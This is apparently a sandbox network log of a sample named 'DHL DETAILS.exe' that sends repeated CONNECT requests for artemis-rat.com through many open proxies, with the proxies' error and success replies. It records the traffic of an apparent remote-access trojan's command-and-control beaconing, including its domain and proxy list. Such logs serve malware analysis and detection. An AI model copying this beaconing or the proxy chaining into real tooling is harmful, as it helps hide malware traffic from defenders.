Mar 9, 2024 13:14:16.536439896 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
365	192.168.2.5	51060	148.66.130.187	5630	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.511801004 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.208056927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.208090067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.270831108 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.364667892 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.380029917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.380387068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.366404057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
366	192.168.2.5	49978	34.95.243.122	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.511892080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.567646027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
367	192.168.2.5	49990	92.205.61.38	48664	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.512972116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
368	192.168.2.5	51108	211.222.252.187	8193	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.513029099 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
369	192.168.2.5	51291	104.16.105.198	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.518073082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.672277927 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
370	192.168.2.5	51140	147.75.34.85	10007	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.519256115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.825725079 CET	356	IN	HTTP/1.0 502 Bad Gateway Server: Zscaler/6.3 Content-Type: text/html Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
371	192.168.2.5	51229	198.199.83.206	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.520066977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
372	192.168.2.5	51007	61.133.66.69	9002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.521562099 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.921705961 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
373	192.168.2.5	51266	13.59.156.167	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.525528908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.742758989 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:13 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
374	192.168.2.5	51149	103.213.97.74	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.527045965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.192476034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.504091024 CET	334	IN	HTTP/1.1 400 Bad Request Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 204 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
375	192.168.2.5	51107	1.194.236.229	5005	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.531193018 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.223680973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.560843945 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
376	192.168.2.5	51165	16.163.88.228	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.531215906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.837392092 CET	668	IN	HTTP/1.1 400 Bad Request Server: nginx/1.16.1 Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 494 Connection: close ETag: "5d52d17f-1ee" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2e 3c 2f 68 31 3e 0a 3c 70 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 62 72 2f 3e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 66 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 74 68 65 6e 20 79 6f 75 20 73 68 6f 75 6c 64 20 63 68 65 63 6b 0a 74 68 65 20 65 72 72 6f 72 20 6c 6f 67 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 3c 2f 70 3e 0a 3c 70 3e 3c 65 6d 3e 46 61 69 74 68 66 75 6c 6c 79 20 79 6f 75 72 73 2c 20 6e 67 69 6e 78 2e 3c 2f 65 6d 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>Error</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>An error occurred.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>If you are the system administrator of this resource then you should checkthe error log for details.</p><p><em>Faithfully yours, nginx.</em></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
377	192.168.2.5	51256	162.223.116.75	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.532699108 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.067466021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.754987001 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.177138090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
378	192.168.2.5	51071	43.243.141.198	228	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.535078049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
379	192.168.2.5	51073	187.40.1.122	128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.540513992 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.927799940 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
380	192.168.2.5	51183	88.99.138.21	6969	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.541142941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
381	192.168.2.5	51166	91.189.177.189	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.543333054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.862222910 CET	1286	IN	HTTP/1.1 403 Forbidden Server: squid/5.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3628 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from lb1 X-Cache-Lookup: NONE from lb1:3128 Via: 1.1 lb1 (squid/5.7) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
382	192.168.2.5	51138	128.199.202.122	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.546757936 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.364821911 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
383	192.168.2.5	50977	27.147.241.134	10800	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.548754930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
384	192.168.2.5	51316	203.32.120.202	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.552300930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
